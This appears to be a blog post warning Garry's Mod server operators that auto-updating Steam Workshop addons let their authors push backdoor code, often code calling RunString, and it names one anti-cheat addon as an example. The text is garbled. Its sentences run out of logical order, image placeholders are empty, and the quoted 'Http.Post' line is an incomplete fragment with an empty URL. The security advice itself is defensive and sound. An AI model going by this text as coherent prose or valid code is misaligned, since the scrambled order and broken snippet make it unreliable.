![]() ![]() Most of these backdoors are pretty lame and just call RunString. If you’re running a popular server, make sure you check the code that you’re running on it.Auto-updating is bad news - if you’re going to use the Workshop on your server, manually add the contents of the GMAs to your addons folder.What if someone used an exploit to run native code from Lua, and pushed out an update to thousands of subscribers? The consequences could be a lot worse than some server having a few people messing with it. Http.Post( "",, function (s) end, function (e) end) The author of the Screen Grabber (Anti-Cheat!) addon did this, and appears to have caused some mayhem on a few servers with this piece of code: 1 All they have to do is update their addon with some malicious code, and then once your server restarts, they have full control. ![]() This means that the author of any addon you are subscribed to has the ability to run any code they want on your server. You have no choice in the matter either, unless you manually add the addons by extracting them into your addons folder. The problem with the Workshop system is that addons will auto-update when you launch the game or start the server. Workshop addons can be installed on clients, but servers can also subscribe to addons. ![]() Garry’s Mod is a pretty popular game now, and it’s easier to use than ever with the built in Steam Workshop support.
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